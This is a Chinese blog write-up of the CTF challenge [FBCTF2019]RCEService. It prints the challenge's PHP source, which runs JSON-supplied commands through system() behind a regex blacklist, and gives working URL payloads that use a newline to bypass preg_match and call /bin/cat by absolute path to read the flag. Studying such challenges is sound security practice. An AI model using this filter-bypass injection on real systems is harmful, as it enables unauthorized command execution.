[FBCTF2019]RCEService

最新推荐文章于 2024-02-17 21:18:36 发布
最新推荐文章于 2024-02-17 21:18:36 发布
阅读量463 收藏 1
点赞数 1
分类专栏: ctfWP 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20533167/article/details/119197830
版权

[FBCTF2019]RCEService

 

一看就是很标准的rce题的模样,要求用json传递,查看页面源代码发现参数是cmd

 

构造ls的json,然后回显了当前目录下的文件,发现只有一个index.php

看到有的师傅wp里写的直接看源码审计,这里其实就是先构造,审计了index.php的源码,然后发现了环境变量,进而找到flag的位置

看页面源码的payload:

http://902101f5-7939-4cb4-a4df-683f733545d7.node4.buuoj.cn/?cmd={%0A%22cmd%22:%20%22/bin/cat%20./index.php%22%0A}

这里学会一个新的修复姿势,后文说,绕过方式就是这个/bin/cat

 

这里莫名其妙还被火绒给拦截了

页面源码

<?php

putenv('PATH=/home/rceservice/jail');


if (isset($_REQUEST['cmd'])) {


$json = $_REQUEST['cmd'];

if (!is_string($json)) {
echo 'Hacking attempt detected<br/><br/>';

} elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {

echo 'Hacking attempt detected<br/><br/>';

} else {

echo 'Attempting to run command:<br/>';

$cmd = json_decode($json, true)['cmd'];

if ($cmd !== NULL) {

system($cmd);

} else {

echo 'Invalid input';

}

echo '<br/><br/>';

}

}

?>

这里其实最重要的点有两个

第一是

putenv('PATH=/home/rceservice/jail');

这里为了避免调用系统命令,就可以临时改环境变量

指定了一个环境变量,也就是cat这个命令是不能直接用的,因为环境变量临时被修改了,所以必须用/bin/cat才可以

 

第二个就是preg_match()这个函数,它有个特性就是只对第一行正则匹配,可以利用这个特性绕过

%0A是换行符

最终payload:

http://902101f5-7939-4cb4-a4df-683f733545d7.node4.buuoj.cn/?cmd={%0A%22cmd%22:%20%22/bin/cat%20/home/rceservice/flag%22%0A}

 

4pri1
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
虚拟机搭建FBCTF平台,汉化版FBCTF-附件资源
03-05
虚拟机搭建FBCTF平台,汉化版FBCTF-附件资源
NetScream(网络加速软件) v1.8.4.2014 官方正式版.zip
07-15
NetScream是一款优化你的modem连接速率的工具。NetScream能提高你的internet连接速度,NetScream官方正式版是目前市场上最佳的modem优化工具之一,能极好地提高你的modem的下载/上传速度。它非常易于使用,完全兼容...
[FBCTF2019]RCEService 1
plant1234的博客
09-30 725
首先打开题目根据测试发现用JSON格式可以命令执行:发现有正则匹配绕过。
[FBCTF2019]RCEService1
最新发布
不会编程的崽的博客
02-17 587
rce 绕过preg_match
[FBCTF2019]RCEService 正则回溯
qq_54929891的博客
03-28 527
打开题目输入JSON类型的cmd后,尝试读取index.php的源代码,但是读取不出来,并且扫后台出来的/index以及/index/login也没有任何东西,实在不知道怎么做了,只能看一下别人的wp,发现别人以来都是审查源码,我就奇怪了,源码怎么弄来的,看了很多wp发现应该是比赛的时候直接给的源码,但是buu平台忘记加上了 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $jso..
BUUCTF-[FBCTF2019]RCEService&[0CTF 2016]piapiapia
weixin_44016181的博客
10-11 201
BUUCTF-[FBCTF2019]RCEService&[0CTF 2016]piapiapia,BUU两道web练习题的WP。
BUUCTF:[FBCTF2019]RCEService
../../../../../../../
06-23 650
打开界面 可以看见提示说要用JSON格式输入cmd中 先尝试一下 {"cmd":"ls"} 出现一个index.php文件 但是获取不到,题目也没有其他信息,然后发现原本题目是提供了源码的,去网上找了找 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacki
图片滚动加载
07-12
图片滚动加载,也被称为“图片懒加载”或“延迟加载”,是现代网页设计中一个重要的优化技术。这种技术主要用于提高网页的加载速度和用户体验,尤其是在处理大量图片的页面时。在传统的网页设计中,所有图片都会在...
feedblitz汉化操作平台
07-22
【feedblitz汉化操作平台】是一个专为中文用户设计的平台,旨在简化Feedblitz服务的使用,使其更加友好和易懂。Feedblitz是一款强大的邮件订阅和自动化营销工具,它允许用户管理电子邮件订阅、发布RSS feed更新,并...
[FBCTF2019]RCEService_WP
Accompany的博客
01-30 306
分析 文章目录分析源码题解 Enter command as JSON: 这便是打开页面的提示了,需要提交命令以JSON的形式,所以在这里先了解一下JSON是什么 了解于此 简单来说形式如下:{名称:值} 检验成功,下来便是通过命令执行获取flag了 接着其实是想cat源码看一看,毕竟一个RCE肯定会有许多过滤,但不管怎样cat,以见过的绕过方式去尝试都是没有回显的,便去看了各位师傅的wp,都说是网上搜的源码,咱也不明白咋来的,就直接奉上吧 源码 <?php putenv('PATH=/ho
开源的CTF比赛平台有那些
03-25
3. FBCTF (https://github.com/facebook/fbctf) 4. RootTheBox (https://github.com/moloch--/RootTheBox) 5. HackTheBox platform (https://github.com/HackTheBox/htb-frontend) 6. Metasploitable 3 CTF platform...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值